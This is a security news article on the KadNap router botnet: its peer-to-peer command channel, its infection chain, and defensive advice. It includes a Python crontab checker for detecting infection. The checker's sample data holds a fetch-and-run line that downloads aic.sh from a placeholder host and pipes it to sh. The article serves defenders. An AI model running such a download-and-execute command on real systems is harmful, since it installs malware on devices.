A newly identified botnet, dubbed KadNap, is actively compromising ASUS routers and other edge networking devices, transforming them into proxies for malicious internet traffic. According to research from Lumen Technologies' Black Lotus Labs, the botnet has grown significantly since August 2025, now encompassing approximately 14,000 devices. These infected devices form a peer-to-peer (P2P) network that leverages a customized version of the Kademlia Distributed Hash Table (DHT) protocol for command-and-control (C2) communications. This decentralized architecture makes the botnet particularly resilient, as there is no single point of failure; C2 information is distributed across the network, with each node managing only a subset of the total data, complicating identification and takedown efforts for defenders.
The infection chain begins when a vulnerable device downloads a malicious shell script (`aic.sh`) from a specific IP address. This script establishes persistence by creating a cron job that executes every 55 minutes. The final payload is an ELF binary named `kad`, which installs the KadNap client. Once active, the malware performs reconnaissance to determine the host's external IP address and contacts multiple Network Time Protocol (NTP) servers to ensure accurate time synchronization—a critical step for coordinating activities and potentially evading time-based detection mechanisms. The primary function of these hijacked devices is to act as proxies, routing traffic for other cybercriminal activities, which can include credential theft, distributed denial-of-service (DDoS) attacks, and anonymizing malicious actors' connections.
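As an added example (not code from the article or from Black Lotus Labs), a small Python checker that flags crontab entries carrying the host indicators described above: a 55-minute schedule, or a command that invokes `aic.sh` or the `kad` binary. The `*/55` cron syntax, the sample crontab and the placeholder download host are assumptions, since the article quotes none of them.

```python
import re

# Indicators named in the article: the dropper script `aic.sh`, the ELF payload
# `kad`, and a cron job firing every 55 minutes. The article does not quote the
# cron entry, so the `*/55` minute field is an assumption; note that cron's
# `*/55` fires at :00 and :55 of each hour, not strictly every 55 minutes.
SUSPICIOUS_NAMES = ("aic.sh", "kad")
CRON_RE = re.compile(r"^(?P<min>\S+)\s+\S+\s+\S+\s+\S+\s+\S+\s+(?P<cmd>.+)$")

def _references_payload(cmd):
    # Compare only the basename of each token so /tmp/kad and ./kad both match.
    hits = []
    for token in re.split(r"[\s;&|]+", cmd):
        base = token.rsplit("/", 1)[-1]
        if base in SUSPICIOUS_NAMES:
            hits.append(base)
    return hits

def scan_crontab(text):
    """Return (line, reasons) pairs for crontab entries matching the indicators."""
    findings = []
    for raw in text.splitlines():
        line = raw.strip()
        m = CRON_RE.match(line)
        if not line or line.startswith("#") or not m:
            continue
        reasons = []
        if m.group("min").endswith("/55"):
            reasons.append("55-minute schedule")
        reasons += [f"references {n}" for n in _references_payload(m.group("cmd"))]
        if reasons:
            findings.append((line, reasons))
    return findings

# Constructed sample crontab; the download host is a placeholder, not a real IoC.
SAMPLE_CRONTAB = """\
0 3 * * * /sbin/logrotate
*/55 * * * * /tmp/kad >/dev/null 2>&1
*/10 * * * * wget -q http://[PLACEHOLDER_IP]/aic.sh -O - | sh
0 4 * * * /usr/bin/ntpdate pool.ntp.org
"""

if __name__ == "__main__":
    for line, reasons in scan_crontab(SAMPLE_CRONTAB):
        print(f"{line!r}: {', '.join(reasons)}")
```

On a live router, feed it the output of `crontab -l` or the contents of the cron spool directory; a hit is a reason to pull the device for firmware reflash, not proof of infection on its own.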
Geographically, the KadNap botnet shows a concentrated footprint. Nearly 60% of the infected devices are located in the United States, with significant percentages also found in Taiwan, Hong Kong, and Russia. Researchers note that nearly half of the KadNap network communicates with C2 infrastructure specifically dedicated to bots running on ASUS hardware, while the remainder connects to two separate control servers. This targeting suggests the attackers may be exploiting known or specific vulnerabilities in ASUS router firmware. The use of a P2P network built on a modified Kademlia DHT is a notable evolution in botnet design, moving away from traditional centralized C2 servers to a more robust and stealthy model that is harder to dismantle.
For network defenders and home users, the emergence of KadNap underscores the critical importance of securing edge devices. Recommendations include immediately changing default credentials on routers, disabling remote administration features unless absolutely necessary, and ensuring router firmware is always updated to the latest version. Organizations should monitor network traffic for unusual outbound connections or unexpected proxy-like behavior from internal devices. The botnet's growth also highlights a broader trend of cybercriminals increasingly targeting often-overlooked network infrastructure to build large-scale, resilient platforms for their operations, making continuous vigilance and proactive patching essential components of modern cybersecurity hygiene.